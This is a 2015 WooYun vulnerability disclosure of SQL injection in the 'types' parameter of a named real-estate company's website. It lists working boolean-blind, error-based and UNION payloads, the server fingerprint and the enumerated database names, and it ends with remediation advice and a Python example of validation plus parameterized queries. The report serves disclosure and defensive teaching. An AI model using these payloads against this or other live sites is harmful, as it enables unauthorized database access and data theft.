WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
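2015-08-25: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public.
2015-10-09: The vendor has actively ignored the vulnerability; details are disclosed to the public.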
SQL injection vulnerability in Century 21 Real Estate (21世纪不动产)
Injection point: http://www.c21wuhan.com.cn/news.html?types=1
Parameter: types (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: types=1 AND 8602=8602

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: types=1 AND 2493=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2493=2493) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(122)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: types=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(77)+CHAR(120)+CHAR(100)+CHAR(69)+CHAR(121)+CHAR(90)+CHAR(69)+CHAR(105)+CHAR(109)+CHAR(108)+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
Database: ReportServerTempDB [9 tables]
Database: msdb [136 tables]
Database: zjxh [2 tables]
Database: Houses [106 tables]
Filter input.
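For a numeric parameter such as `types`, filtering in practice means an integer allow-list check combined with a bound query parameter. The following is an added example, not part of the original report or the site's code, showing the flawed query construction next to the corrected one. It assumes an in-memory SQLite table as a stand-in for the SQL Server back end; the table, column and function names are hypothetical.

```python
import sqlite3

# Constructed stand-in data: an in-memory SQLite table replaces the site's
# SQL Server back end; table and column names are hypothetical.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, type_id INTEGER, title TEXT)")
    db.executemany("INSERT INTO news (type_id, title) VALUES (?, ?)",
                   [(1, "Market update"), (1, "New listings"), (2, "Company notice")])
    return db

def news_vulnerable(db, types):
    # Flawed pattern: the query-string value becomes part of the SQL text,
    # so anything after the leading number is parsed as SQL.
    sql = "SELECT title FROM news WHERE type_id = " + types + " ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def parse_types(raw):
    # Allow-list check: ASCII digits only, bounded length; otherwise reject.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("types must be a non-negative integer")
    return int(raw)

def news_hardened(db, types):
    # Validate first, then bind the value as a parameter so it is never
    # interpreted as SQL, even if the validation were later loosened.
    type_id = parse_types(types)
    sql = "SELECT title FROM news WHERE type_id = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (type_id,))]

def bound_without_validation(db, types):
    # Parameter binding alone: the payload is compared as a plain value.
    sql = "SELECT title FROM news WHERE type_id = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (types,))]

if __name__ == "__main__":
    db = make_db()
    payload = "1 AND 8602=8602"  # boolean-based payload quoted in the report
    print("vulnerable:", news_vulnerable(db, payload))
    print("bound only:", bound_without_validation(db, payload))
    try:
        news_hardened(db, payload)
    except ValueError as exc:
        print("hardened rejects:", exc)
```
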
Unable to contact the vendor, or the vendor actively refused.